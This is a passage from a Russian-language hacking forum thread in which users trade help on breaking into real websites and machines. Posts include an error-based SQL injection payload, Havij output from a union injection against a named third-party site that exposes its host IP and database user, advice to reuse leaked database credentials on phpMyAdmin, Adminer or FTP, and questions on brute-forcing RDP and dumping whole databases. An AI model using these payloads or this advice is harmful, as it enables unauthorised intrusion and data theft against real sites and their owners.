HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #621  
Старый 02.10.2015, 00:04
ButilkaSoka
Guest
Сообщений: n/a
Провел на форуме:
7285

Репутация: 0
По умолчанию

ХЕЛП

если

Код:
Code:
'and extractvalue(null,concat(0x3a,(select concat(mid(КОЛОНКА,1,64)) from ТАБЛИЦА limit 0,1)))='
то

You can't specify target table 'ТАБЛИЦА' for update in FROM clause
 
Ответить с цитированием

  #622  
Старый 02.10.2015, 00:48
cheebeez
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360

Репутация: 0
По умолчанию

[DEL 39]
 
Ответить с цитированием

  #623  
Старый 02.10.2015, 00:57
ButilkaSoka
Guest
Сообщений: n/a
Провел на форуме:
7285

Репутация: 0
По умолчанию

Цитата:
Сообщение от cheebeez  
cheebeez said:

Говорит, что нельзя делать одновременно апдэйт и селект к одной колонке.
Опечатался,

You can't specify target table 'ТАБЛИЦА' for update in FROM clause
 
Ответить с цитированием

  #624  
Старый 02.10.2015, 16:24
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

тебе уже ответили .
------------------------------------------------------------
Мой вопрос .
Где находится админка по адреcсу good-steam.ru ?
P.S просто у меня вот это есть
Код:
Code:

Полюбому к админке .
это настройки для подключения к бд
 
Ответить с цитированием

  #625  
Старый 02.10.2015, 17:59
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

И что мне это не как не пригодится? .
ищи интерфейс для подключения к БД (PMA, Adminer, etc), или попробуй подключиться удаленно. так же пробуй эти данные к другим сервисам, например FTP (бывает что совпадают)
 
Ответить с цитированием

  #626  
Старый 03.10.2015, 01:42
cheebeez
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360

Репутация: 0
По умолчанию

[DEL 52]
 
Ответить с цитированием

  #627  
Старый 04.10.2015, 18:30
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

Здравствуйте, имеется компьютер на windows xp (другой есть на windows server 2012), на нем есть RDP, netBios. Получить в NetBios список ресурсов получилось лишь пользовательский, хотя xSpider смог получить все:

сборник - пользовательский

IPC$ (Удаленный IPC) - pipe по умолчанию

D$ (Стандартный общий ресурс) - диск по умолчанию

ADMIN$ (Удаленный Admin) - диск по умолчанию

C$ (Стандартный общий ресурс) - диск по умолчанию

Подключается лишь к сборнику. Остальное - не получается null login не работает.

Получил список пользователей, я так понял netBios имена, это пользователи windows, вопрос, теперь только брутом RDP брать? Нет ли каких уязвимостей? Поиском особо ничего не нашел. По данной теме. Может еще есть советы по netBios
 
Ответить с цитированием

  #628  
Старый 05.10.2015, 09:27
AlexG
Guest
Сообщений: n/a
Провел на форуме:
11344

Репутация: 5
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Не проще ли заинжектить прогой,хэвидж всё вывел .
Код:
Code:
Target:         http://www.fimca.com.br/pagina.asp?id=-11%20union%20select%201,2,3,concat_ws%280x3a,table_name,column_name%29,5,6%20from%20information_schema.columns
Host IP:        191.252.45.189
Web Server:     Microsoft-IIS/6.0
Powered-by:     ASP.NET
DB Server:     MySQL
Resp. Time(avg):    7342 ms
Current User:     fimca@191.252.45.189
Sql Version:     5.1.54-rel12.6-log
Current DB:     fimca
System User:     fimca@191.252.45.189
Host Name:     hm7092
Installation dir:     /usr/
DB User:     'fimca'@'%'
Data Bases:     information_schema
        fimca
Админка в /admin,но без нужных прав не пустят(403 Forbbiden) .
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?

UPD. Закрыто, ниже frank ответил.
 
Ответить с цитированием

  #629  
Старый 05.10.2015, 11:17
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

Цитата:
Сообщение от AlexG  
AlexG said:

Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
http://raz0r.name/obzory/group_concat/
 
Ответить с цитированием

  #630  
Старый 05.10.2015, 11:48
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от AlexG  
AlexG said:

Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
UPD. Закрыто, ниже frank ответил.
/threads/425320/
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ